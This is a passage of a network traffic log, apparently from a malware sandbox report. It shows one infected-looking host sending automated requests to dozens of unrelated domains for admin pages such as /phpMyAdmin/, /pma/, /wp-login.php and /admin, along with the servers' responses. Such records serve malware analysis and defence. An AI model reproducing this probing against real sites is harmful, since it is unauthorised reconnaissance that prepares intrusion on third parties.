d1\E3=8l6H>shhX?5s"tKeZ8oTROel=A}h$2
Nov 30, 2023 11:22:41.215019941 CET	1340	IN	Data Raw: 72 82 0f 03 df 1f b8 ac 6c f9 e3 8a 69 87 cc 0b 59 c5 f6 c7 a6 e3 85 15 cb ec 97 ef c3 97 66 6f 62 e8 b9 e3 17 15 31 f8 98 b3 21 8c 16 2e d3 c6 cc 76 4c 23 87 0e 06 96 1d 6f 94 cd 10 0b fd 1c 46 66 50 d5 be 6c 3c eb 99 d6 68 10 f8 53 cf 3e d4 a6 Data Ascii: rliYfob1!.vL#oFfPl<hS>[W*v}SkeEh,i<p-K03,pG8[5>i0c?N8q!:+q5?ED'=1pwDNLvA)b%1C,xgF5W^3X
Nov 30, 2023 11:22:41.215034962 CET	1340	IN	Data Raw: 67 ae c3 fc 8c 99 d3 70 e0 1b e0 84 9b fb dc c3 b1 79 04 a5 7a f6 ec 59 f3 ba f5 af ff 6d 37 34 fc 7f f3 ee ba 79 7a b5 f1 ec 45 c5 c4 69 ba 02 3d 94 87 e0 55 8d ac 49 8d 24 fa d6 28 6c 5d e9 5e 06 11 81 56 4e a3 d5 0b 1a 89 44 65 c0 8b a1 1e 1f Data Ascii: gpyzYm74yzEi=UI$(l]^VNDeKL!&BTm+dUd8YSmR SlKkZ]{Op]BC2AP96p3c`9^5XY0I<Ly\|Qee2Z0Z^i1jPL\w
Nov 30, 2023 11:22:41.215060949 CET	1340	IN	Data Raw: 17 0d 18 6d cc 86 70 e1 47 1c 10 16 fd cd 6e 3f 18 b3 80 e6 60 76 23 18 4c 69 a7 08 d3 19 12 5c d7 13 da 17 a9 e7 0b 77 32 f9 c9 b4 77 69 93 e3 b1 27 c8 f8 21 8b 49 25 09 14 30 aa ba 74 57 d8 e8 43 b8 94 f0 0d 28 3d 31 43 76 1b b8 04 be 9e ff f9 Data Ascii: mpGn?`v#Li\w2wi'!I%0tWC(=1Cv(4ZxbFcS16ri!zSZ_3o]?/-lQ8c4No^7A# 9kSegrC8WE-<#'xQQO*y
Nov 30, 2023 11:22:41.215095997 CET	1340	IN	Data Raw: 67 6d 9f e8 4d e5 ba 76 39 3f 74 29 01 bb 67 16 82 f7 3f bb 1e b1 16 ba 99 c1 33 7c 73 44 1f 71 d4 a2 15 fc de 3d ae 56 e3 77 2d d6 53 25 d4 a1 4e 8a ad 72 f8 02 12 72 e9 f9 88 f7 20 3f 88 72 0f 97 33 5d d9 a0 ac 83 86 ab f5 74 24 e7 13 26 1a 40 Data Ascii: gmMv9?t)g?3\|sDq=Vw-S%Nrr ?r3]t$&@+PS.G,\|khLhC.c5]>Or/)_R %cR&NeMrIy%;WxQBtyS6VqP8V~?ZF[zx_"XU]D=x:R\3
Nov 30, 2023 11:22:41.215109110 CET	230	IN	Data Raw: 29 03 94 02 45 47 19 b9 72 81 d0 49 0e cf 48 07 b8 61 81 ac 37 2b e2 02 86 a4 c1 23 ee 69 5b 56 bd cf ec ed 5d eb 40 df ab eb fb b5 3d 66 b1 6d d6 e3 b8 f5 fd de de 4e 5d ef eb 56 bf 8a e5 a5 6a 9c 71 bf 79 7a d9 a1 92 de 98 16 d7 2b 89 05 f4 66 Data Ascii: )EGrIHa7+#i[V]@=fmN]Vjqyz+f<9OoNH/vuItS3h$q*[`_P@59]-A0

Session ID	Source IP	Source Port	Destination IP	Destination Port
124	192.168.2.4	61445	67.21.93.254	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:40.927894115 CET	213	OUT	GET /pma/ HTTP/1.1 Host: il.cm Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:41.080096960 CET	358	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Thu, 30 Nov 2023 10:22:40 GMT Content-Type: text/html; charset=utf-8 Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
125	192.168.2.4	61367	3.64.163.50	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:40.939989090 CET	223	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: gbya.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:41.125130892 CET	341	IN	HTTP/1.1 410 Gone Server: openresty Date: Thu, 30 Nov 2023 10:22:41 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 34 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 67 62 79 61 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>44 <meta http-equiv='refresh' content='0; url=http://gbya.com/' />a </head>8</html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
126	192.168.2.4	61584	3.64.163.50	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:41.016746044 CET	221	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: gmo.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:41.204061985 CET	339	IN	HTTP/1.1 410 Gone Server: openresty Date: Thu, 30 Nov 2023 10:22:41 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 32 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 67 6d 6f 2e 75 6b 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>42 <meta http-equiv='refresh' content='0; url=http://gmo.uk/' />a </head>8</html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
127	192.168.2.4	61776	15.197.142.173	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:41.062757015 CET	216	OUT	GET /admin HTTP/1.1 Host: m7l.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:41.165905952 CET	418	IN	HTTP/1.1 404 Not Found Date: Thu, 30 Nov 2023 10:22:41 GMT Content-Type: text/html; charset=utf-8 Content-Length: 125 Connection: keep-alive Server: ip-10-123-123-67.ec2.internal X-Request-Id: 78b078c1-1715-4913-ae66-6ee25284566a Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
128	192.168.2.4	60679	157.7.44.171	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:41.238457918 CET	225	OUT	GET /wp-login.php HTTP/1.1 Host: gmaso.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:41.508336067 CET	228	IN	HTTP/1.1 403 Forbidden Date: Thu, 30 Nov 2023 10:22:41 GMT Content-Type: text/html Content-Length: 12245 Connection: keep-alive Server: Apache ETag: "63366736-2fd5"
Nov 30, 2023 11:22:41.508444071 CET	1340	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="ja"> <head> <title>403 error - Forbidden</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
Nov 30, 2023 11:22:41.508466005 CET	1340	IN	Data Raw: 47 38 79 74 7a 6e 39 63 62 4f 32 4d 58 4e 31 2b 58 74 39 39 44 58 34 4d 37 56 33 73 33 55 33 63 7a 54 33 4e 7a 6a 37 4e 72 68 36 74 2f 6b 36 74 6a 64 34 39 58 61 34 50 4c 32 2b 2b 76 76 39 4f 50 6e 37 4f 4c 6d 36 33 6d 56 74 64 48 59 34 4d 2f 57 Data Ascii: G8ytzn9cbO2MXN1+Xt99DX4M7V3s3U3czT3Nzj7Nrh6t/k6tjd49Xa4PL2++vv9OPn7OLm63mVtdHY4M/W3t/m7urx+cPW6s7g8s3c6+Pq8ePo7e7x9Ovu8ert8Pj5+tzd3r7W7dDg7kmCrF+Mrm6VtHqgvYirxcfe70yJs0uHsUeAqEZ9pVORvFGOt1aTvFqVvlyYwGGcxGCbw2KdxWKYvWOStGaWuX2szIuxzKXH3rbR49rk6
Nov 30, 2023 11:22:41.508485079 CET	1340	IN	Data Raw: 63 5a 52 41 41 68 30 78 32 43 48 44 49 45 78 30 4d 59 62 46 34 2f 70 72 7a 38 59 64 42 34 4f 43 49 6f 6f 59 6b 67 4d 4e 63 33 77 51 68 77 74 33 35 49 45 44 45 49 36 34 30 67 38 2f 2b 75 42 6a 54 7a 33 6a 6d 6b 76 50 7a 66 72 73 30 34 38 2f 4b 44 Data Ascii: cZRAAh0x2CHDIEx0MYbF4/prz8YdB4OCIooYkgMNc3wQhwt35IEDEI640g8/+uBjTz3jmkvPzfrs048/KDwsBxp4uFyII6cE448/S+uTzz31XCxQPOfWcw8++ezDjxN37HE0Ja30s/Q++5g1jc89T18crUD+omvP23Dno7ji+Pxtz9NpzxN1SdNSey49mGeeueTydB7P4HN9LvrooM8VQEAAOw==') no-repeat top left;
Nov 30, 2023 11:22:41.508507013 CET	1340	IN	Data Raw: 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 74 65 6d 6c 2e 6a 70 2f 22 3e 3c 69 6d 67 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 67 69 66 3b 62 61 73 65 36 34 2c 52 30 6c 47 4f 44 6c 68 62 41 49 5a 41 4e 55 41 41 50 4c 79 38 67 4f 50 7a 76 Data Ascii: ef="https://heteml.jp/"><img src="data:image/gif;base64,R0lGODlhbAIZANUAAPLy8gOPzvT09Pb29jc3N4GBgfv8/Pz7/P3+/f39/vv7/Pv8+/79/fz8+/Tz9P7+/f3+/vz7+/P09Pj3+P79/vj4+Pf39/Pz8/T08/X19ff39vj4+fPz8vP08/f49/v7+/z8/P39/fr6+v7+/vn5+QAAAP////Hx8QAAAAAAAAA
Nov 30, 2023 11:22:41.508582115 CET	1340	IN	Data Raw: 49 78 4d 55 49 30 51 55 46 47 4f 44 4d 79 52 45 46 44 4d 6a 45 33 4e 54 45 69 49 48 4e 30 55 6d 56 6d 4f 6d 52 76 59 33 56 74 5a 57 35 30 53 55 51 39 49 6e 68 74 63 43 35 6b 61 57 51 36 4d 54 4a 44 51 6a 67 31 51 54 63 35 4f 54 6c 45 52 54 49 78 Data Ascii: IxMUI0QUFGODMyREFDMjE3NTEiIHN0UmVmOmRvY3VtZW50SUQ9InhtcC5kaWQ6MTJDQjg1QTc5OTlERTIxMUI0QUFGODMyREFDMjE3NTEiLz4gPC9yZGY6RGVzY3JpcHRpb24+IDwvcmRmOlJERj4gPC94OnhtcG1ldGE+IDw/eHBhY2tldCBlbmQ9InIiPz4B//79/Pv6+fj39vX08/Lx8O/u7ezr6uno5+bl5OPi4eDf3t3c2
Nov 30, 2023 11:22:41.508723021 CET	1340	IN	Data Raw: 34 6d 59 30 58 6f 67 51 43 44 49 4f 64 36 4e 69 4e 4c 4c 6f 59 34 32 77 75 45 68 6b 66 43 36 32 2b 4b 4f 4e 4d 4f 4a 59 6c 35 41 32 48 69 6b 57 6a 55 6f 6d 43 65 53 53 73 4f 54 59 34 6f 73 36 46 73 6d 6c 6b 6b 30 4f 39 2b 57 51 58 53 4a 5a 70 6c Data Ascii: 4mY0XogQCDIOd6NiNLLoY42wuEhkfC62+KONMOJYl5A2HikWjUomCeSSsOTY4os6Fsmlkk0O9+WQXSJZplhYxvdilVAW+SSYZxoZZ5ojvBgmiVSKaeWORsIJZpun2Akomnt6KWWJZwbpZKG55cnknC4OuuKWh9Kp6JWMTlnpnVm+iamkjrrJqZmLtmnETzvaeWKKIzRgJ4WBvmjAqii2aieqZ9WpKkIU2HkArqf0eEpigpKWqgG
Nov 30, 2023 11:22:41.508744001 CET	1340	IN	Data Raw: 2b 5a 49 78 69 4e 55 36 4a 50 53 6d 67 77 53 59 41 6f 47 47 33 7a 53 58 61 4b 4b 44 6a 2f 32 64 43 4b 32 69 6c 53 2f 39 39 63 61 44 6c 46 43 73 79 58 41 68 53 65 77 35 78 6a 52 46 63 6b 7a 70 48 6d 61 4b 4e 45 46 4e 52 4e 68 56 6e 51 69 73 6f 30 Data Ascii: +ZIxiNU6JPSmgwSYAoGG3zSXaKKDj/2dCK2ilS/99caDlFCsyXAhSew5xjRFckzpHmaKNEFNRNhVnQiso0peNEqUmvedGl1pSl+9QoQINZ0oaO9KIQJecwWxpUoWI0qViN6kQdClWmlpWqPFUoVimq1SCNlKRnReNN4TrMka7UreO0qVWBKdW9isAIFdjABirgVX72jJ/QNNoGgLhYairTsECsJoo2QALKFpajM2onZS0r1AoEl
Nov 30, 2023 11:22:41.508768082 CET	1340	IN	Data Raw: 74 35 37 76 6d 58 65 2b 38 71 2b 2f 74 38 78 7a 66 2f 57 55 54 2f 37 57 53 38 2f 38 72 68 39 2f 2b 64 50 2f 76 74 4f 4e 37 33 76 31 65 31 2f 38 72 34 63 2f 2b 57 4d 66 2f 76 4f 72 50 2f 7a 79 4e 7a 2f 39 39 63 39 35 39 47 4e 66 2f 66 46 33 66 50 Data Ascii: t57vmXe+8q+/t8xzf/WUT/7WS8/8rh9/+dP/vtON73v1e1/8r4c/+WMf/vOrP/zyNz/99c959GNf/fF3fPPHd1r3ARlAd8oEQxlwNQSAQ9K0NCLQgFMTdv8y8oBw53jjR3dxFEcHqIGXJ3xi53oloIE3tDdi13kfeIJ2d0QgeHkZWHd3JwILiIJw80IteHgtKIIeSHh0d4B8xIHC94Or14G014F1d0ovqHoikIOekwFEqHodmAF
Nov 30, 2023 11:22:41.777040958 CET	1340	IN	Data Raw: 7a 65 65 51 45 72 6d 71 41 74 2b 70 77 4b 4a 61 47 35 2b 5a 72 48 36 5a 77 48 36 70 2f 6a 36 5a 7a 37 64 4b 50 58 71 5a 74 5a 57 71 43 7a 75 61 49 6b 45 4b 44 65 69 61 51 6a 4e 5a 76 34 32 61 57 79 69 5a 74 46 4f 71 63 38 53 71 61 79 61 61 48 32 Data Ascii: zeeQErmqAt+pwKJaG5+ZrH6ZwH6p/j6Zz7dKPXqZtZWqCzuaIkEKDeiaQjNZv42aWyiZtFOqc8SqayaaH2mabfuaLYaaJvaqCAaqbbyaHNWajbdKhualRwyqUjKqZuuk+BeqZGYKn7lKIA4KnXlKIpuqawSaqmSqqiGp6ouqaqmqqt+qmxOqocUKquegGhCqu2Kqv/uzqqs8qqvQqsq0oCtYqrujqsr3qrwXqqywoAoYqsv0qs0
Nov 30, 2023 11:22:41.777069092 CET	725	IN	Data Raw: 20 20 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 20 20 20 20 20 20 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 74 65 6d 6c 2e 6a 70 2f 22 3e 3c 69 6d 67 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 67 69 66 Data Ascii: <div id="footer"> <p><a href="https://heteml.jp/"><img src="data:image/gif;base64,R0lGODlhQAALALMAAAAAAP///wCOzUKr2uv2+4LI5sbm9Ovr68bGxoKCgoCAgEJCQj09PR4eHv///wAAACH5BAEAAA4ALAAAAABAAAsAAASMMEgJKpg4Y3u1/yCXiaBGluh3UlyVHMGRVIEgFETQijJt4
Nov 30, 2023 11:22:41.783966064 CET	262	OUT	GET /wp-admin/ HTTP/1.1 Host: gmaso.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://gmaso.com/wp-login.php
Nov 30, 2023 11:22:42.052645922 CET	228	IN	HTTP/1.1 403 Forbidden Date: Thu, 30 Nov 2023 10:22:41 GMT Content-Type: text/html Content-Length: 12245 Connection: keep-alive Server: Apache ETag: "63366736-2fd5"

Session ID	Source IP	Source Port	Destination IP	Destination Port
129	192.168.2.4	62018	104.238.144.219	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:41.425122976 CET	224	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: nrnet.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:41.555239916 CET	542	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 30 Nov 2023 10:22:41 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_wsgi/4.6.4 Python/3.6 Location: https://nrnet.com/phpMyAdmin/ Content-Length: 237 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6e 72 6e 65 74 2e 63 6f 6d 2f 70 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://nrnet.com/phpMyAdmin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
130	192.168.2.4	61961	64.190.63.111	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:41.438715935 CET	217	OUT	GET /admin HTTP/1.1 Host: apee.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:41.629553080 CET	142	IN	HTTP/1.1 439 date: Thu, 30 Nov 2023 10:22:41 GMT content-length: 0 server: NginX

Session ID	Source IP	Source Port	Destination IP	Destination Port
131	192.168.2.4	61586	157.7.44.171	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:41.479721069 CET	224	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: gmaso.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:41.741230965 CET	432	IN	HTTP/1.1 404 Not Found Date: Thu, 30 Nov 2023 10:22:41 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 209 Connection: keep-alive Server: Apache Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 70 68 70 4d 79 41 64 6d 69 6e 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /phpMyAdmin/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
132	192.168.2.4	62168	104.238.144.219	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:41.481281996 CET	224	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: nrnet.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:41.611455917 CET	542	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 30 Nov 2023 10:22:41 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_wsgi/4.6.4 Python/3.6 Location: https://nrnet.com/phpMyAdmin/ Content-Length: 237 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6e 72 6e 65 74 2e 63 6f 6d 2f 70 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://nrnet.com/phpMyAdmin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
133	192.168.2.4	62113	213.171.212.244	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:41.513292074 CET	221	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:41.693445921 CET	442	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:22:41 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/phpMyAdmin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
134	192.168.2.4	62326	192.99.158.243	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:41.565996885 CET	225	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: onlist.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:41.681085110 CET	569	IN	HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=utf-8 Location: http://ww42.onlist.com Server: Microsoft-IIS/10.0 X-AspNetMvc-Version: 5.2 X-AspNet-Version: 4.0.30319 Set-Cookie: _dhc.139992723=fffe06fd-d381-49d4-850d-1b15b8e9eb0b; path=/ X-Powered-By: ASP.NET Date: Thu, 30 Nov 2023 10:20:14 GMT Connection: close Content-Length: 139 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 34 32 2e 6f 6e 6c 69 73 74 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://ww42.onlist.com">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
135	192.168.2.4	62371	15.197.172.60	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:41.584362030 CET	219	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: 1.tv Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
